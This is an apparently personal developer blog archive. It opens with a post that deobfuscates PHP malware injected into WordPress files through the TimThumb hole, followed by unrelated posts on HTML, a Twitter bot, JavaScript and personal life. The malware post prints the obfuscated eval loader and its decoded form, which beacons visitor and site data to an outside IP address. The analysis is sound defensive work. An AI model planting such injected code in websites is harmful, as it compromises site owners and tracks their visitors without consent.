Over the past few months, there have been a few vulnerabilies in PHP scripts utilised by various WordPress themes. One of the largest hacks was back in August, when a Remote File Inclusion (RFI) vulnerability was found in TimThumb, a thumbnail generation script used by a lot of WordPress themes. This vulnerability allowed attackers to run any PHP code on vulnerable sites. As a result of this, thousands of sites were hacked.

The most common result of your site being hacked through like this is having some sort of malicious code added to your PHP files. This is often invisible, and people don't notice that their site has malicious code lurking in it until much later. However, sometimes the hacked code does have errors in it. One particular payload is being referred to as the "'Cannot redeclare' hack", as it causes an error like the following to appear in your site's footer:

Fatal error: Cannot redeclare _765258526() (previously declared in /path/to/www/wp-content/themes/THEME/footer.php(12) : eval()'d code:1) in /path/to/www/index.php(18) : eval()'d code on line 1

This particular hack affects all the index.php and footer.php files in your WordPress installation. If you are affected by this hack and open any index.php or footer.php file, you'll see code that starts like this: (the full code is on Pastebin)


<?php eval(gzuncompress(base64_decode('eF5Tcffxd3L0CY5Wj...

Decoding the Code

If you're this far, I assume you're a PHP developer (or at least know the basics of PHP). The malicious code above is actually highly obfuscated PHP code, which means that the actual intent of the code is hidden and it looks like jibberish. The eval statement runs arbitrary PHP code, so this line of code will basically base64 decode and then run the big block of code. So... what does the code actually do? Obviously we can't tell with it in its current state. It does take a bit of effort, but this code can be "decoded" relatively easy. Obfuscation is not one-way, it can always be undone. While we can't get back the original variable names, we can see what functions the code is executing.

The first step in decoding this code is replacing all instances of eval with echo, and then running the script. This should output the code being executed, instead of actually executing it. After doing this, I ended up with something like the following:


$GLOBALS['_2143977049_']=Array();
function _765258526($i){$a=Array();return base64_decode($a[$i]);}

eval(gzuncompress(base64_decode('eF5Tcffxd3L0CY5WjzcyMjM...

Great, another layer of gzipped/base64'd obfuscation. This technique is common with obfuscated code like this. Multiple layers of obfuscation makes it harder for someone to decode the code, as it requires more effort. I guess the "bad guys" think that people will get tired of trying to unobfuscate the code, and give up, or something like that. When a case like this is encountered, keep replacing eval with echo and re-running the script, until there's no eval statements left. After decoding all the eval'd code and formatting the resulting code, I ended up with this. While there's readable code there now, it's still obfuscated.

Once you're this far, if you look closely at the code, you'll notice that a lot of it is encoded using base64. The next step to unobfuscating thid code is to decode all base64-encoded text. That is, find all instances of base64_decode(...) and replace it with the base64 decoded version. Once I did that, I ended up with this:


<?php 
$GLOBALS['_226432454_']=Array();
function _1618533527($i)
{
        return '91.196.216.64';
}
 
$ip=_1618533527(0);
$GLOBALS['_1203443956_'] = Array('urlencode');
function _1847265367($i)
{
        $a=Array('http://','/btt.php?ip=','REMOTE_ADDR','&host=','HTTP_HOST','&ua=','HTTP_USER_AGENT','&ref=','HTTP_REFERER');
        return $a[$i];
}
$url = _1847265367(0) .$ip ._1847265367(1) .$_SERVER[_1847265367(2)] ._1847265367(3) .$_SERVER[_1847265367(4)] ._1847265367(5) .$GLOBALS['_1203443956_'][0]($_SERVER[_1847265367(6)]) ._1847265367(7) .$_SERVER[_1847265367(8)];
$GLOBALS['_399629645_']=Array('function_exists', 'curl_init', 'curl_setopt', 'curl_setopt', 'curl_setopt', 'curl_exec', 'curl_close', 'file_get_contents');
function _393632915($i)
{
    return 'curl_version';
}
if ($GLOBALS['_399629645_'][0](_393632915(0))) 
{
        $ch=$GLOBALS['_399629645_'][1]($url);
        $GLOBALS['_399629645_'][2]($ch,CURLOPT_RETURNTRANSFER,true);
        $GLOBALS['_399629645_'][3]($ch,CURLOPT_HEADER,round(0));
        $GLOBALS['_399629645_'][4]($ch,CURLOPT_TIMEOUT,round(0+0.75+0.75+0.75+0.75));
        $re=$GLOBALS['_399629645_'][5]($ch);
        $GLOBALS['_399629645_'][6]($ch);
}
else
{
        $re=$GLOBALS['_399629645_'][7]($url);  
}
echo $re;
?>

Now you simply need to go through the code and "execute it in your head". Follow the execution path of the code, and see which variables are used where. There's some usage of arrays to disguise certain variables. What I did was first replaced the two function calls (_1618533527 and _1847265367), and then replaced the array usages (_1203443956_, _399629645_ and _399629645_). Substitute the variables in the places they're used, and the code should be fully obfuscated. Once fully unobfuscated, the code came down to the following:


<?php
$url = 'http://91.196.216.64/btt.php?ip=' . $_SERVER['REMOTE_ADDR'] . '&host=' . $_SERVER['HTTP_HOST'] . '&ua=' . urlencode($_SERVER['HTTP_USER_AGENT']) . '&ref=' . $_SERVER['HTTP_REFERER'];

if (function_exists('curl_version'))
{
	$ch = curl_init($url);
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
	curl_setopt($ch, CURLOPT_HEADER, 0);
	curl_setopt($ch, CURLOPT_TIMEOUT, 3);
	$re = curl_exec($ch);
	curl_close($ch);
}
else
{
	$re = file_get_contents($url);
}
echo $re;

So, what it's actually doing is sending a request to 91.196.216.64 (a server located in Russia), telling it your site's hostname, your user agent (what browser you're using), and the referer (how you got to the page). This is not directly malicious (this code can't directly do anything bad), which makes it interesting. My theory is that the developer of the worm is using this to create a list of all vulnerable sites, to use them for further hacks in the near future.

So, that's it. Hopefully this post wasn't too boring (and perhaps you even learnt how to unobfuscate code like this). As more people learn how to unobfuscate code like this, I suspect that the "hackers" will keep getting smarter and devising more clever code obfuscation techniques. Until then, finding out what the code actually does is relatively quick and easy, as I've demonstrated here.

Until next time,
— Daniel

Am I the only person that cringes when I see HTML like this?

<div class="h1Title"><div class="spriteicon_img_mini" id="icon-name_mini"></div>Page Title</div>

Or like this?

<!--Start Footer-->
<div id="heading-bottom_bg" class="spriteheading_bg footer">
	<ul class="links footer_ul">
		<li class="footer_li"><a class="footer_li_a bottomlink" href="../index.html">Home</a></li>
		<li class="footer_li"><span class="footer" style="font-size:18px;">&#9642;</span></li>
		...
		<li class="footer_li"><a class="footer_li_a bottomlink" href="/logout/">Log out</a></li>
	</ul>
</div>

Notice the classes on all those elements. Really? A web developer that doesn't know about the <h1> tag or CSS descendant/child selectors? Why do people feel the need to use <div> tags for everything, when there's other more semantic tags available? It really doesn't make sense to me; some of the first HTML tags I learnt were <h1> and <p>.

For what it's worth, this is how I'd rewrite those two blocks of HTML:

<h1 class="icon-name">Page Title</h1>
<!--Start Footer-->
<div id="footer">
	<ul>
		<li><a href="../index.html">Home</a> &#9642;</li>
		...
		<li><a href="/logout/">Log out</a></li>
	</ul>
</div>

It's good to keep your HTML and CSS selectors as simple as possible. There's no need for a "footer_li" class when you can just use "#footer li" in your CSS. The "icon-name" CSS class on the <h1> is used for a CSS sprite to display next to the heading. Also, as an alternative, the separator (&#9642;) that was originally in a <span> after all the footer items can easily be added via the :after pseudo selector instead of being in the <li>.

It's really frustrating that there's so many "web developers" that don't seem to know basic HTML. It's okay if you're just starting to learn, this is fair enough. The HTML I "wrote" when I started web development was horrendous. And by "wrote" I mean "created in FrontPage 98". But it's another thing altogether to be a developer for a number of years and still write ugly HTML like this.

Ugly JavaScript seems to be way more common, though. But that's a rant for another day.

So I thought I'd finally write a little blog post about a Twitter bot I made a while ago. A few people emailed me asking for the source code, so I had previously posted about it on webDevRefinery, but never on my own blog. Basically all the bot does is search for whenever people mention "over 9000" or "over nine thousand", and replies with "WHAT, NINE THOUSAND?!". Pretty simple, but I wanted to learn about using the Twitter API. It seems to have inspired the creation of other Twitter bots, like AnnoyingNavi and The Spacesphere, which I think is pretty cool. :).

The source code is available as a Gist on Github. It is written in PHP and requires the PECL OAuth extension to be installed. I think it's a pretty good example of a simple "search and reply" Twitter bot, that could easily be extended to do more useful things.

Until next time,
— Daniel

I was rewriting my site recently (to use the Kohana framework instead of WordPress), and I decided to write my own blog system at the same time. Finally, I've finished a basic version of it, and it's now live! This site is running on it, so hopefully there's no major issues! I do still love WordPress, but as a developer, it's often fun to create your own stuff (you know exactly what the code is doing, and it does exactly what you want). The code for this whole website is now available on Github, maybe some of you would find it interesting (especially if you're doing something similar yourself). Still a bit rough around the edges, but it's working fine. I've still got a bit I'd like to do with the blog (like improving the administration section). :)

My old blog used to have a "microblog" section where I'd occassionally post photos and stuff. I've moved all that onto a Tumblr account, although now I'm thinking I should have used Posterous instead. Tumblr's uptime seems quite bad. I really don't understand why it's so popular... It seems like it's mainly the community rather than the site itself.

Eventually I might even post a proper blog article to here. Or to my other blog with my girlfriend :)

Until then,
— Daniel

In this post, I'll discuss more of my opinions regarding JavaScript development. Please read the first post in the series if you haven't already. In this post, I'll cover some relatively important language features that don't seem to be covered in a lot of basic JavaScript guides. I'm assuming you have a basic knowledge of JavaScript. Let's begin.

Functions are variables

In most programming languages, functions are a pretty basic language feature. They're quite nice for structuring your code, but don't really have any built-in awesomeness. Some programming languages have features to dynamically call functions at run-time (usually referred to as reflection), but JavaScript has a LOT more power in this area. In JavaScript, functions are known as first-class objects. Functions are stored in normal variables, and you can create new ones (known as anonymous functions) and edit existing ones on the fly. Functions can also be return values from other functions! This enables a whole range of different programming techniques known as metaprogramming.

Let's take a look at some examples.

Read more ⇒

A lot of sites now use OpenID. This is great, as you can use the one account on multiple sites. Unfortunately, Facebook accounts can not yet be used as OpenIDs :(. However, using Facebook logins isn't too hard, as they support using OAuth 2.0. OpenID and OAuth are fundamentally for different things (OpenID is authentication, OAuth is authorization), but it still works well in this situation.

Firstly, sign up for a Facebook application at the Facebook developer website. You'll have to correctly set the site URL and site domain. Copy the application ID and application secret as shown on the Web Site section of the settings, as you will need them later.

Read more ⇒

So as you'd already know, Ciera came back to Australia three weeks ago, which is why I haven't really been on messenger much recently :P. Things have been excellent so far, it's been really enjoyable. Last week, we made some delicious rainbow cookies. They were pretty much just plain lemon cookies based on a recipe from a $4 book we bought at Go-Lo, WITH A DIFFERENCE! We made them awesome by colouring them all different colours (and even made some multi-colour, which was my idea :D). They were delicious and colourful and made with 100% awesomesauce. Next time we make some, we'll make them all rainbow I think xD.

Yesterday (Saturday), we went to Scienceworks, which is a science museum here in Melbourne. Well, we got there eventually. We had a few minor issues along the way. Firstly, we got off at Parliament Train Station (as the Metlink journey planner said to), and the platform that the train we needed usually comes to was closed, and there was a notice to go to Southern Cross Station. So, we went back to the platform we came from, and caught another train to Southern Cross. When we got to Southern Cross, the train took aaaages to come (then again, it's the Weribee line so it's kinda expected I guess :P). And then there was another complication — The train terminated at Footscray and we had to take a replacement bus the rest of the way. However, once we caught that bus, we finally got there. Entry is free if you're a student, so that's definitely a bonus.

While I've been to Scienceworks before, it was a long long time ago and I couldn't remember much of it. This time around it was pretty good and I found it quite interesting. They had a toy exhibit, which was awesome! They had a roller coaster made out of K'Nex which was very nice. I want one!! Get me one please? I'm such a child at times, I don't think that'll ever change :D. Anyways, there was also other exhibits like a flight simulator, a kitchen thingy and a nice fire show (with demonstrations, Aaron would have loved it xD). There's also a planetarium there, but we didn't go this time (maybe we'll go next time). And we also went to the store there, and bought some glow-in-the-dark stars (which we stuck all over the roof in our room :D). All in all, it was a very fun day, I really enjoyed it! Was definitely worth the $0 entry to Scienceworks, hahaha :P.

As for work, things are going very good. Since I just passed the six month mark for my IBL placement, I moved from the technical support team at work into one of the development teams. We've been working on improving our products by making commonly-requested upgrades. When clients would like functionality that is currently not available in our system, their request goes onto a wishlist. My team went through the wishlist, rated all the items based on priority, and started working on them. In just two weeks, we've completed heaps, and a few people are very happy :D! I've also been doing a few other things, it's been quite good. I really enjoy my job! Also since it's about the half way mark now, my mid-placement report is nearly due. I've nearly finished it, just have to confirm that it's alright, and show it to my supervisor and see if he thinks it's alright.

So it's the start of another week tomorrow. I really miss Ciera during the day while I'm at work, but it's awesome coming home to her! Really makes me happy and makes everything I do worth it. <3

Until next time,
— Daniel

So, my girlfriend Ciera came back to Melbourne last Saturday (26th June 2010)! We've been having a great time so far, I'm so very glad to see her again! I honestly don't think I would have been able to wait much longer, so I'm extremely happy that she came her when she did. It's been a week since she got here, and things have already been so amazing! I think she's been enjoying it here heaps (I know she loves it in Australia), and I've certainly enjoyed it. Today we just did a bit of shopping, nothing too big. Bought a bookshelf to put all our books and stuff on :P

I can't wait for what the future is going to bring us!

Ciera and me!

Until next time,
— Daniel

I've added a "Microblog" section to this blog, which I'll basically (try to) use to post things when I'm out and about. Kinda like Twitter, but maybe with longer posts. Like a... microblog, or tumbleblog (Tumblr, etc.)

Ciera gets here tomorrow morning! EPIC excitedness! I can't wait!!! :D

Until next time,
— Daniel

1 2 3 4 5 6 7 8 9